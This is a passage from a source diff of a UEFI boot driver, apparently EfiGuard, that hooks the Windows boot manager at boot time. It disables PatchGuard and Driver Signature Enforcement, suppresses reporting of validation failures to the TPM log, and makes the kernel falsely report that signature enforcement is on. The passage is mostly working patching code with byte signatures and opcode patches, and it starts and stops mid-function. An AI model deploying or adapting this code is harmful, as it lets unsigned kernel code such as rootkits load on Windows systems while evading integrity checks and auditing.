+ if (!WaitForKey())
+ {
+ gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL);
+ }
+ goto Exit;
+ }
+
+ // Print file and version info
+ UINT16 MajorVersion = 0, MinorVersion = 0, BuildNumber = 0, Revision = 0;
+ Status = GetPeFileVersionInfo(ImageBase, &MajorVersion, &MinorVersion, &BuildNumber, &Revision, NULL);
+ if (EFI_ERROR(Status))
+ Print(L"\r\nPatchBootManager: WARNING: failed to obtain %S.efi version info. Status: %llx\r\n", ShortFileName, Status);
+ else
+ {
+ Print(L"\r\nPatching %S.efi v%u.%u.%u.%u...\r\n", ShortFileName, MajorVersion, MinorVersion, BuildNumber, Revision);
+
+ // Check if this is a supported boot manager version. All patches should work on all versions since Vista SP1,
+ // except for the ImgpFilterValidationFailure patch because this function only exists on Windows 7 and higher.
+ if (BuildNumber < 6001)
+ {
+ Print(L"\r\nPatchBootManager: ERROR: Unsupported %S.efi image version.\r\n"
+ L"The minimum supported boot manager version is Windows Vista SP1.\r\n"
+ L"It is recommended to use the Windows 10 boot manager even when running an older OS.\r\n", ShortFileName);
+ Status = EFI_UNSUPPORTED;
+ goto Exit;
+ }
+ }
+
+ // Find [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication
+ CONST CHAR16* FunctionName = BuildNumber >= 17134 ? L"ImgArchStartBootApplication" : L"ImgArchEfiStartBootApplication";
+ CONST PEFI_IMAGE_SECTION_HEADER CodeSection = IMAGE_FIRST_SECTION(NtHeaders);
+ UINT8* Found = NULL;
+ Status = FindPattern(SigImgArchStartBootApplication,
+ 0xCC,
+ sizeof(SigImgArchStartBootApplication),
+ (UINT8*)ImageBase + CodeSection->VirtualAddress,
+ CodeSection->SizeOfRawData,
+ (VOID**)&Found);
+ if (EFI_ERROR(Status))
+ {
+ Print(L"\r\nPatchBootManager: failed to find %S!%S signature. Status: %llx\r\n", ShortFileName, FunctionName, Status);
+ goto Exit;
+ }
+
+ // Found signature; backtrack to function start
+ // Note: pOriginalAddress is a pointer to a (function) pointer, because the original address depends on the type of boot manager we are patching.
+ VOID **pOriginalAddress = PatchingBootmgrEfi ? &gOriginalBootmgrImgArchStartBootApplication : &gOriginalBootmgfwImgArchStartBootApplication;
+ *pOriginalAddress = (VOID*)BacktrackToFunctionStart(Found, MAX((UINT8*)ImageBase + CodeSection->VirtualAddress, Found - 1024));
+ CONST VOID* OriginalAddress = *pOriginalAddress;
+ if (OriginalAddress == NULL)
+ {
+ Print(L"\r\nPatchBootManager: failed to find %S!%S function start [signature at 0x%p].\r\n", ShortFileName, FunctionName, (VOID*)Found);
+ Status = EFI_NOT_FOUND;
+ goto Exit;
+ }
+
+ // Found
+ VOID* HookAddress;
+ if (BuildNumber < 9200)
+ HookAddress = PatchingBootmgrEfi ? (VOID*)&HookedBootmgrImgArchEfiStartBootApplication_Vista : (VOID*)&HookedBootmgfwImgArchEfiStartBootApplication_Vista;
+ else
+ HookAddress = PatchingBootmgrEfi ? (VOID*)&HookedBootmgrImgArchStartBootApplication_Eight : (VOID*)&HookedBootmgfwImgArchStartBootApplication_Eight;
+ UINT8* BackupAddress = PatchingBootmgrEfi ? gBootmgrImgArchStartBootApplicationBackup : gBootmgfwImgArchStartBootApplicationBackup;
+ Print(L"\r\nFound %S!%S at 0x%p.\r\n", ShortFileName, FunctionName, (VOID*)OriginalAddress);
+ Print(L"Hooked%S%S at 0x%p.\r\n", (PatchingBootmgrEfi ? L"Bootmgr" : L"Bootmgfw"), FunctionName, HookAddress);
+
+ CONST EFI_TPL Tpl = gBS->RaiseTPL(TPL_HIGH_LEVEL); // Note: implies cli
+
+ // Backup original function prologue
+ CopyMem(BackupAddress, (VOID*)OriginalAddress, sizeof(gHookTemplate));
+
+ // Place faux call (push addr, ret) at the start of the function to transfer execution to our hook
+ CopyMem((VOID*)OriginalAddress, (VOID*)gHookTemplate, sizeof(gHookTemplate));
+ *(UINTN*)((UINT8*)OriginalAddress + 2) = (UINTN)HookAddress;
+
+ gBS->RestoreTPL(Tpl);
+
+ // Patch ImgpValidateImageHash to allow custom boot loaders. This is completely
+ // optional (unless booting a custom winload.efi), and failures are ignored
+ PatchImgpValidateImageHash(FileType,
+ (UINT8*)ImageBase,
+ NtHeaders);
+
+ if (BuildNumber >= 7600)
+ {
+ // Patch ImgpFilterValidationFailure so it doesn't silently
+ // rat out every violation to a TPM or SI log. Also optional
+ PatchImgpFilterValidationFailure(FileType,
+ (UINT8*)ImageBase,
+ NtHeaders);
+ }
+
+Exit:
+ if (EFI_ERROR(Status))
+ {
+ // Patch failed. Prompt user to ask what they want to do
+ Print(L"\r\nPress any key to continue anyway, or press ESC to reboot.\r\n");
+ if (!WaitForKey())
+ {
+ gRT->ResetSystem(EfiResetCold, EFI_SUCCESS, 0, NULL);
+ }
+ }
+ else
+ {
+ Print(L"Successfully patched %S!%S.\r\n", ShortFileName, FunctionName);
+ RtlSleep(2000);
+
+ if (gDriverConfig.WaitForKeyPress)
+ {
+ Print(L"\r\nPress any key to continue.\r\n");
+ WaitForKey();
+ }
+ }
+
+ // Return success, because even if the patch failed, the user chose not to reboot above
+ return EFI_SUCCESS;
+}
diff --git a/EfiGuardDxe/PatchNtoskrnl.c b/EfiGuardDxe/PatchNtoskrnl.c
new file mode 100644
index 0000000..b5d34f6
--- /dev/null
+++ b/EfiGuardDxe/PatchNtoskrnl.c
@@ -0,0 +1,661 @@
+#include "EfiGuardDxe.h"
+
+#include <Library/BaseMemoryLib.h>
+
+
+// Global kernel patch status information.
+//
+// The justification for statically allocating these ~8KB is that this buffer will be accessible during both contexts of winload.efi. Winload has two
+// runtime contexts: the real mode firmware context (= 1), in which EFI services are accessible, and the protected mode application context (= 0),
+// which has its own GDT, IDT and paging levels and which is used to set up the NT environment and enable virtual addressing. Winload switches between
+// the two with BlpArchSwitchContext() when needed. Because we cannot allocate memory in protected mode (e.g. in PatchNtoskrnl), and any memory
+// allocated in real mode (e.g. in PatchWinload) will need address translation on later access, this is by far the simplest solution
+// because it allows the buffer to be accessed from both contexts at all stages of driver execution.
+KERNEL_PATCH_INFORMATION gKernelPatchInfo;
+
+
+// Signature for ntoskrnl!KeInitAmd64SpecificState
+// This function is present in all x64 kernels since Vista. It generates a #DE due to 32 bit idiv quotient overflow.
+STATIC CONST UINT8 SigKeInitAmd64SpecificState[] = {
+ 0xF7, 0xD9, // neg ecx
+ 0x45, 0x1B, 0xC0, // sbb r8d, r8d
+ 0x41, 0x83, 0xE0, 0xEE, // and r8d, 0FFFFFFEEh
+ 0x41, 0x83, 0xC0, 0x11, // add r8d, 11h
+ 0xD1, 0xCA, // ror edx, 1
+ 0x8B, 0xC2, // mov eax, edx
+ 0x99, // cdq
+ 0x41, 0xF7, 0xF8 // idiv r8d
+};
+
+// Signature for SeCodeIntegrityQueryInformation, called through NtQuerySystemInformation(SystemCodeIntegrityInformation).
+// This function has actually existed since Vista in various forms, sometimes (8/8.1/early 10) inlined in ExpQuerySystemInformation.
+// This signature is only for the Windows 10 RS3+ version. I could add more signatures but this is a pretty superficial patch anyway.
+STATIC CONST UINT8 SigSeCodeIntegrityQueryInformation[] = {
+ 0x48, 0x83, 0xEC, // sub rsp, XX
+ 0xCC, 0x48, 0x83, 0x3D, 0xCC, 0xCC, 0xCC, 0xCC, 0x00, // cmp cs:qword_14035E638, 0
+ 0x4D, 0x8B, 0xC8, // mov r9, r8
+ 0x4C, 0x8B, 0xD1, // mov r10, rcx
+ 0x74, 0xCC, // jz XX
+ 0x8A, 0x05, 0xCC, 0xCC, 0xCC, 0xCC, // mov al, cs:SeILSigningPolicy
+ 0x0F, 0xB6, 0xC8, // movzx ecx, al
+ 0x84, 0xC0, // test al, al
+ 0x75, 0xCC, // jnz XX
+ 0x0F, 0xB6, 0x0D, 0xCC, 0xCC, 0xCC, 0xCC // movzx ecx, cs:SeILSigningPolicyRuntime
+};
+
+// Patched SeCodeIntegrityQueryInformation which reports that DSE is enabled
+STATIC CONST UINT8 SeCodeIntegrityQueryInformationPatch[] = {
+ 0x41, 0xC7, 0x00, 0x08, 0x00, 0x00, 0x00, // mov dword ptr [r8], 8
+ 0x33, 0xC0, // xor eax, eax
+ 0xC7, 0x41, 0x04, 0x01, 0x00, 0x00, 0x00, // mov dword ptr [rcx+4], 1
+ 0xC3 // ret
+};
+
+
+//
+// Defuses PatchGuard initialization routines before execution is transferred to the kernel.
+// All code accessed here is located in the INIT section.
+//
+STATIC
+EFI_STATUS
+EFIAPI
+DisablePatchGuard(
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN PEFI_IMAGE_SECTION_HEADER InitSection,
+ IN UINT16 BuildNumber
+ )
+{
+ CONST UINT32 StartRva = InitSection->VirtualAddress;
+ CONST UINT32 SizeOfRawData = InitSection->SizeOfRawData;
+ CONST UINT8* StartVa = ImageBase + StartRva;
+
+ // Search for KeInitAmd64SpecificState
+ PRINT_KERNEL_PATCH_MSG(L"\r\n== Searching for nt!KeInitAmd64SpecificState pattern in INIT ==\r\n");
+ UINT8* KeInitAmd64SpecificStatePatternAddress = NULL;
+ for (UINT8* Address = (UINT8*)StartVa; Address < StartVa + SizeOfRawData - sizeof(SigKeInitAmd64SpecificState); ++Address)
+ {
+ if (CompareMem(Address, SigKeInitAmd64SpecificState, sizeof(SigKeInitAmd64SpecificState)) == 0)
+ {
+ KeInitAmd64SpecificStatePatternAddress = Address;
+ PRINT_KERNEL_PATCH_MSG(L" Found KeInitAmd64SpecificState pattern at 0x%llX.\r\n", (UINTN)KeInitAmd64SpecificStatePatternAddress);
+ break;
+ }
+ }
+
+ // Backtrack to function start
+ UINT8* KeInitAmd64SpecificState = BacktrackToFunctionStart(KeInitAmd64SpecificStatePatternAddress,
+ (UINT8*)(KeInitAmd64SpecificStatePatternAddress - StartVa));
+ if (KeInitAmd64SpecificState == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find KeInitAmd64SpecificState%S.\r\n",
+ (KeInitAmd64SpecificStatePatternAddress == NULL ? L" pattern" : L""));
+ return EFI_NOT_FOUND;
+ }
+
+ // Search for CcInitializeBcbProfiler (Win 8+) / <HUGEFUNC> (Win Vista/7)
+ // Most variables below use the 'CcInitializeBcbProfiler' name, which is not really accurate for Windows Vista/7 but close enough.
+ // For debug prints, call the function "<HUGEFUNC>" instead if we're on Windows Vista/7. (seriously, it's fucking huge)
+ CONST CHAR16* FuncName = BuildNumber >= 9200 ? L"CcInitializeBcbProfiler" : L"<HUGEFUNC>";
+ PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!%S ==\r\n", FuncName);
+ UINT8* CcInitializeBcbProfilerPatternAddress = NULL;
+
+ // On Windows Vista/7 we need to find the address of RtlPcToFileHeader, which will help identify HUGEFUNC as no other function calls this
+ UINTN RtlPcToFileHeader = 0;
+ if (BuildNumber < 9200)
+ {
+ RtlPcToFileHeader = (UINTN)GetProcedureAddress((UINTN)ImageBase, NtHeaders, "RtlPcToFileHeader");
+ if (RtlPcToFileHeader == 0)
+ {
+ PRINT_KERNEL_PATCH_MSG(L"Failed to find RtlPcToFileHeader export.\r\n");
+ return EFI_NOT_FOUND;
+ }
+ }
+
+ // Initialize Zydis
+ ZydisDecoder Decoder;
+ ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL);
+ if (!ZYAN_SUCCESS(Status))
+ {
+ PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n");
+ return EFI_LOAD_ERROR;
+ }
+
+ CONST UINTN Length = SizeOfRawData;
+ UINTN Offset = 0;
+ ZyanU64 InstructionAddress;
+ ZydisDecodedInstruction Instruction;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(StartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ if (BuildNumber < 9200)
+ {
+ // Windows Vista/7: check if this is 'call IMM'
+ if (Instruction.operand_count == 4 &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_CALL)
+ {
+ // Check if this is 'call RtlPcToFileHeader'
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == RtlPcToFileHeader)
+ {
+ CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress;
+ PRINT_KERNEL_PATCH_MSG(L" Found 'call RtlPcToFileHeader' at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress);
+ break;
+ }
+ }
+ }
+ else
+ {
+ // Windows 8+: check if this is 'mov [al|rax], 0x0FFFFF780000002D4' ; SharedUserData->KdDebuggerEnabled
+ if ((Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV && Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER) &&
+ ((Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
+ (UINT64)(Instruction.operands[1].mem.disp.value) == 0x0FFFFF780000002D4ULL) ||
+ (Instruction.operands[0].reg.value == ZYDIS_REGISTER_RAX && Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE &&
+ Instruction.operands[1].imm.value.u == 0x0FFFFF780000002D4ULL)))
+ {
+ CcInitializeBcbProfilerPatternAddress = (UINT8*)InstructionAddress;
+ PRINT_KERNEL_PATCH_MSG(L" Found CcInitializeBcbProfiler pattern at 0x%llX.\r\n", (UINTN)CcInitializeBcbProfilerPatternAddress);
+ break;
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ // Backtrack to function start
+ UINT8* CcInitializeBcbProfiler = BacktrackToFunctionStart(CcInitializeBcbProfilerPatternAddress,
+ (UINT8*)(CcInitializeBcbProfilerPatternAddress - StartVa));
+ if (CcInitializeBcbProfiler == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find %S%S.\r\n",
+ FuncName, (CcInitializeBcbProfilerPatternAddress == NULL ? L" pattern" : L""));
+ return EFI_NOT_FOUND;
+ }
+
+ // Search for ExpLicenseWatchInitWorker (only exists on Windows >= 8)
+ UINT8* ExpLicenseWatchInitWorker = NULL;
+ if (BuildNumber >= 9200)
+ {
+ PRINT_KERNEL_PATCH_MSG(L"== Disassembling INIT to find nt!ExpLicenseWatchInitWorker ==\r\n");
+ UINT8* ExpLicenseWatchInitWorkerPatternAddress = NULL;
+
+ // Start decode loop
+ Offset = 0;
+ while ((InstructionAddress = (ZyanU64)(StartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is 'mov al, ds:[0x0FFFFF780000002D4]' ; SharedUserData->KdDebuggerEnabled
+ // The address must also obviously not be the CcInitializeBcbProfiler one we just found
+ if ((UINT8*)InstructionAddress != CcInitializeBcbProfilerPatternAddress &&
+ Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_AL &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[1].mem.segment == ZYDIS_REGISTER_DS &&
+ Instruction.operands[1].mem.disp.value == 0x0FFFFF780000002D4LL)
+ {
+ ExpLicenseWatchInitWorkerPatternAddress = (UINT8*)InstructionAddress;
+ PRINT_KERNEL_PATCH_MSG(L" Found ExpLicenseWatchInitWorker pattern at 0x%llX.\r\n", (UINTN)ExpLicenseWatchInitWorkerPatternAddress);
+ break;
+ }
+
+ Offset += Instruction.length;
+ }
+
+ // Backtrack to function start
+ ExpLicenseWatchInitWorker = BacktrackToFunctionStart(ExpLicenseWatchInitWorkerPatternAddress,
+ (UINT8*)(ExpLicenseWatchInitWorkerPatternAddress - StartVa));
+ if (ExpLicenseWatchInitWorker == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find ExpLicenseWatchInitWorker%S.\r\n",
+ (ExpLicenseWatchInitWorkerPatternAddress == NULL ? L" pattern" : L""));
+ return EFI_NOT_FOUND;
+ }
+ }
+
+ // We have all the addresses we need; now do the actual patching.
+ CONST UINT32 Yes = 0xC301B0; // mov al, 1, ret
+ CONST UINT32 No = 0xC3C033; // xor eax, eax, ret
+ *((UINT32*)KeInitAmd64SpecificState) = No;
+ *((UINT32*)CcInitializeBcbProfiler) = Yes;
+ if (ExpLicenseWatchInitWorker != NULL)
+ *((UINT32*)ExpLicenseWatchInitWorker) = No;
+
+ // Print info
+ PRINT_KERNEL_PATCH_MSG(L"\r\n Patched KeInitAmd64SpecificState [RVA: 0x%X].\r\n",
+ (UINT32)(KeInitAmd64SpecificState - ImageBase));
+ PRINT_KERNEL_PATCH_MSG(L" Patched %S [RVA: 0x%X].\r\n",
+ FuncName, (UINT32)(CcInitializeBcbProfiler - ImageBase));
+ if (ExpLicenseWatchInitWorker != NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Patched ExpLicenseWatchInitWorker [RVA: 0x%X].\r\n",
+ (UINT32)(ExpLicenseWatchInitWorker - ImageBase));
+ }
+
+ return EFI_SUCCESS;
+}
+
+//
+// Disables DSE for the duration of the boot by preventing it from initializing.
+// This function is only called if DseBypassMethod is DSE_DISABLE_AT_BOOT, or if the Windows version is Vista or 7
+// and DseBypassMethod is DSE_DISABLE_SETVARIABLE_HOOK. In the latter case, only one byte is patched to make
+// the SetVariable backdoor safe to use more than once. DSE will still be fully initialized in this case.
+// All code accessed here is located in the PAGE section.
+//
+STATIC
+EFI_STATUS
+DisableDSE(
+ IN UINT8* ImageBase,
+ IN PEFI_IMAGE_NT_HEADERS NtHeaders,
+ IN PEFI_IMAGE_SECTION_HEADER PageSection,
+ IN EFIGUARD_DSE_BYPASS_TYPE BypassType,
+ IN UINT16 BuildNumber
+ )
+{
+ if (BypassType == DSE_DISABLE_NONE)
+ return EFI_INVALID_PARAMETER;
+
+ CONST UINT32 PageSizeOfRawData = PageSection->SizeOfRawData;
+ CONST UINT8* PageStartVa = ImageBase + PageSection->VirtualAddress;
+
+ // Find the ntoskrnl.exe IAT address for CI.dll!CiInitialize
+ VOID* CiInitialize;
+ CONST EFI_STATUS IatStatus = FindIATAddressForImport(ImageBase,
+ NtHeaders,
+ "CI.dll",
+ "CiInitialize",
+ &CiInitialize);
+ if (EFI_ERROR(IatStatus))
+ {
+ PRINT_KERNEL_PATCH_MSG(L"Failed to find IAT address of CI.dll!CiInitialize.\r\n");
+ return IatStatus;
+ }
+
+ PRINT_KERNEL_PATCH_MSG(L"\r\n== Disassembling PAGE to find nt!SepInitializeCodeIntegrity 'mov ecx, xxx' ==\r\n");
+
+ // Initialize Zydis
+ ZydisDecoder Decoder;
+ ZyanStatus Status = ZydisInit(NtHeaders, &Decoder, NULL);
+ if (!ZYAN_SUCCESS(Status))
+ {
+ PRINT_KERNEL_PATCH_MSG(L"Failed to initialize disassembler engine.\r\n");
+ return EFI_LOAD_ERROR;
+ }
+
+ UINT8* SepInitializeCodeIntegrityMovEcxAddress = NULL;
+ UINTN Length, Offset;
+ ZyanU64 InstructionAddress;
+ ZydisDecodedInstruction Instruction;
+
+ if (BuildNumber < 9200)
+ {
+ // On Windows Vista/7 we have an enormously annoying import thunk in .text to find. All it does is 'jmp __imp_CiInitialize'.
+ // SepInitializeCodeIntegrity will then call this thunk. What a waste
+ CONST PEFI_IMAGE_SECTION_HEADER TextSection = IMAGE_FIRST_SECTION(NtHeaders);
+ VOID* JmpCiInitializeAddress = NULL;
+ Length = TextSection->SizeOfRawData;
+ Offset = 0;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(ImageBase + TextSection->VirtualAddress + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ if ((Instruction.operand_count == 2 &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_JMP)
+ {
+ // Check if this is 'jmp qword ptr ds:[CiInitialize IAT RVA]'
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == (UINTN)CiInitialize)
+ {
+ JmpCiInitializeAddress = (VOID*)InstructionAddress;
+ break;
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (JmpCiInitializeAddress == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find 'jmp __imp_CiInitialize' import thunk.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ // Make this the new 'IAT address' to simplify checks below
+ CiInitialize = JmpCiInitializeAddress;
+ }
+
+ UINT8* LastMovIntoEcx = NULL; // Keep track of 'mov ecx, xxx' - the last one before call/jmp cs:__imp_CiInitialize is the one we want to patch
+ Length = PageSizeOfRawData;
+ Offset = 0;
+
+ // Start decode loop
+ while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is a 2-byte (size of our patch) 'mov ecx, <anything>' and store the instruction address if so
+ if (Instruction.operand_count == 2 && Instruction.length == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_ECX)
+ {
+ LastMovIntoEcx = (UINT8*)InstructionAddress;
+ }
+ else if ((BuildNumber >= 9200 &&
+ ((Instruction.operand_count == 2 || Instruction.operand_count == 4) &&
+ (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) &&
+ ((Instruction.mnemonic == ZYDIS_MNEMONIC_JMP && Instruction.operand_count == 2) ||
+ (Instruction.mnemonic == ZYDIS_MNEMONIC_CALL && Instruction.operand_count == 4))))
+ ||
+ (BuildNumber < 9200 &&
+ (Instruction.operand_count == 4 &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[0].imm.is_relative == ZYAN_TRUE &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_CALL)))
+ {
+ // Check if this is
+ // 'call IMM:CiInitialize thunk' // E8 ?? ?? ?? ?? // Windows Vista/7
+ // or
+ // 'jmp qword ptr ds:[CiInitialize IAT RVA]' // 48 FF 25 ?? ?? ?? ?? // Windows 8 through 10.0.15063.0
+ // or
+ // 'call qword ptr ds:[CiInitialize IAT RVA]' // FF 15 ?? ?? ?? ?? // Windows 10.0.16299.0+
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == (UINTN)CiInitialize)
+ {
+ SepInitializeCodeIntegrityMovEcxAddress = LastMovIntoEcx; // The last 'mov ecx, xxx' before the call/jmp is the instruction we want
+ PRINT_KERNEL_PATCH_MSG(L" Found 'mov ecx, xxx' in SepInitializeCodeIntegrity [RVA: 0x%X].\r\n",
+ (UINT32)(SepInitializeCodeIntegrityMovEcxAddress - ImageBase));
+ break;
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (SepInitializeCodeIntegrityMovEcxAddress == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find SepInitializeCodeIntegrity 'mov ecx, xxx' pattern.\r\n");
+ return EFI_NOT_FOUND;
+ }
+
+ UINTN gCiEnabled = 0;
+ if (BuildNumber < 9200)
+ {
+ // On Windows Vista/7, find g_CiEnabled now because it's a few bytes away and we'll it need later
+ Length = 32;
+ Offset = 0;
+
+ while ((InstructionAddress = (ZyanU64)(SepInitializeCodeIntegrityMovEcxAddress + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // Check if this is 'mov g_CiEnabled, REG8'
+ if (Instruction.operand_count == 2 &&
+ Instruction.mnemonic == ZYDIS_MNEMONIC_MOV &&
+ Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER)
+ {
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, (ZyanU64*)&gCiEnabled)))
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Found g_CiEnabled at 0x%llX.\r\n", gCiEnabled);
+ break;
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (gCiEnabled == 0)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find g_CiEnabled.\r\n");
+ return EFI_NOT_FOUND;
+ }
+ }
+
+ PRINT_KERNEL_PATCH_MSG(L"== Disassembling PAGE to find nt!SeValidateImageData '%S' ==\r\n",
+ (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al"));
+ UINT8 *SeValidateImageDataMovEaxAddress = NULL, *SeValidateImageDataJzAddress = NULL;
+
+ // Start decode loop
+ Length = PageSizeOfRawData;
+ Offset = 0;
+ while ((InstructionAddress = (ZyanU64)(PageStartVa + Offset),
+ Status = ZydisDecoderDecodeBuffer(&Decoder,
+ (VOID*)InstructionAddress,
+ Length - Offset,
+ &Instruction)) != ZYDIS_STATUS_NO_MORE_DATA)
+ {
+ if (!ZYAN_SUCCESS(Status))
+ {
+ Offset++;
+ continue;
+ }
+
+ // On Windows >= 8, check if this is 'mov eax, 0xC0000428' (STATUS_INVALID_IMAGE_HASH) in SeValidateImageData
+ if ((BuildNumber >= 9200 &&
+ (Instruction.operand_count == 2 && Instruction.mnemonic == ZYDIS_MNEMONIC_MOV) &&
+ (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[0].reg.value == ZYDIS_REGISTER_EAX) &&
+ Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_IMMEDIATE && Instruction.operands[1].imm.value.s == 0xc0000428LL))
+ {
+ // Exclude false positives: next instruction must be jmp rel32 (Win 8), jmp rel8 (Win 8.1/10) or ret
+ CONST UINT8* Address = (UINT8*)InstructionAddress;
+ CONST UINT8 JmpOpcode = BuildNumber >= 9600 ? 0xEB : 0xE9;
+ if (*(Address + Instruction.length) == JmpOpcode || *(Address + Instruction.length) == 0xC3)
+ {
+ SeValidateImageDataMovEaxAddress = (UINT8*)Address;
+ PRINT_KERNEL_PATCH_MSG(L" Found 'mov eax, 0xC0000428' in SeValidateImageData [RVA: 0x%X].\r\n",
+ (UINT32)(SeValidateImageDataMovEaxAddress - ImageBase));
+ break;
+ }
+ }
+ // On Windows Vista/7, check if this is 'cmp g_CiEnabled, al' in SeValidateImageData
+ else if (BuildNumber < 9200 &&
+ (Instruction.operand_count == 3 && Instruction.mnemonic == ZYDIS_MNEMONIC_CMP) &&
+ (Instruction.operands[0].type == ZYDIS_OPERAND_TYPE_MEMORY && Instruction.operands[0].mem.base == ZYDIS_REGISTER_RIP) &&
+ (Instruction.operands[1].type == ZYDIS_OPERAND_TYPE_REGISTER && Instruction.operands[1].reg.value == ZYDIS_REGISTER_AL))
+ {
+ ZyanU64 OperandAddress = 0;
+ if (ZYAN_SUCCESS(ZydisCalcAbsoluteAddress(&Instruction, &Instruction.operands[0], InstructionAddress, &OperandAddress)) &&
+ OperandAddress == gCiEnabled)
+ {
+ // Verify the next instruction is jz, and store its address instead of the cmp, as we will be patching the jz
+ CONST UINT8* Address = (UINT8*)InstructionAddress;
+ if (*(Address + Instruction.length) == 0x74)
+ {
+ SeValidateImageDataJzAddress = (UINT8*)(Address + Instruction.length);
+ PRINT_KERNEL_PATCH_MSG(L" Found 'cmp g_CiEnabled, al' in SeValidateImageData [RVA: 0x%X].\r\n",
+ (UINT32)(Address - ImageBase));
+ break;
+ }
+ }
+ }
+
+ Offset += Instruction.length;
+ }
+
+ if (SeValidateImageDataMovEaxAddress == NULL && SeValidateImageDataJzAddress == NULL)
+ {
+ PRINT_KERNEL_PATCH_MSG(L" Failed to find SeValidateImageData '%S' pattern.\r\n",
+ (BuildNumber >= 9200 ? L"mov eax, 0xC0000428" : L"cmp g_CiEnabled, al"));
+ return EFI_NOT_FOUND;
+ }
+
+ // We have all the addresses we need; now do the actual patching.
